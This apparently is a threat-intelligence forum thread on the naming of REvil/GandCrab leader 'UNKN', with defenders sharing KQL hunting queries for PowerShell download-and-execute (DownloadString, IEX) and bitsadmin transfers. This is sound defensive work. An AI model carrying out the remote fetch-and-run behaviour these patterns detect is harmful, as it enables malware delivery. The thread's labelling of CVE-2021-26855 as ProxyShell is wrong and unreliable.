GandCrab/REvil 'UNKN' Doxed: Shchukin Named by German Authorities
Huge development regarding threat attribution this morning. German authorities have named Daniil Maksimovich Shchukin (31) as the elusive "UNKN," the alleged mastermind behind GandCrab and REvil. While this is primarily an intelligence win, it reminds us of the massive footprint these groups left behind.
Shchukin is linked to over 130 acts of sabotage. Technically, these gangs were pioneers of the RaaS model and heavily relied on exploiting on-premise vulnerabilities to gain initial access. We're talking about classics like CVE-2021-26855 (ProxyShell) and CVE-2021-34527 (PrintNightmare).
Since REvil operations were highly manual for lateral movement, hunting for the specific TTPs they popularized remains relevant. Affiliates often used PowerShell for discovery and exfiltration. If you are auditing your environment for remnants or similar successor behaviors, keep an eye on BITSAdmin or specific PowerShell encoded commands.
Here is a KQL snippet for hunting suspicious PowerShell download patterns often associated with these loader scripts:
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "powershell.exe"
| where ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "IEX"
| where ProcessCommandLine matches regex @"http[s]?://[^\s]+\.ps1"
| project DeviceName, AccountName, FolderPath, ProcessCommandLine
Given that the RaaS code is likely already in the wild among former affiliates, does identifying the leadership actually disrupt current operations, or is this just a retrospective win for law enforcement?
It’s definitely a retrospective win for intel, but the operational disruption is minimal. The 'brand' of REvil fractured months ago. We still see distinct variants of the Sodinokibi encryptor in the wild—likely from affiliates who kept the builders. I'd recommend checking for unsigned binaries dropping in C:\Windows\Temp as well, since that was a common staging ground for their droppers post-initial access.
From an MSP perspective, the biggest takeaway is the lifecycle of these exploits. We're still cleaning up ProxyShell and SonicWall vulnerabilities that these groups exploited years ago. Attribution is great for the news cycle, but for us, it just reinforces that patch hygiene is the only real defense against these legacy RaaS operations.
I dug into the indictment details—shoddy OPSEC was his undoing. Using personal email for recovery and linking online identities is a rookie mistake for someone of that caliber. Technically, the malware was sophisticated, but the tradecraft on the identity side failed. We often focus too much on the binary analysis and not enough on the identity correlation of the threat actors.
While attribution helps close the legal chapter, the source code leaks mean the TTPs live on. As EDR engineers, we’re still seeing loaders leveraging BITSAdmin for persistence in newer variants. I recommend hunting for these specific process chains rather than just hashing old binaries. You can use this KQL query to check for suspicious BITS activity on your endpoints:
DeviceProcessEvents
| where FileName =~ "bitsadmin.exe"
| where CommandLine contains "/transfer" or CommandLine contains "download"
Verified Access Required
To maintain the integrity of our intelligence feeds, only verified partners and security professionals can post replies.
Request Access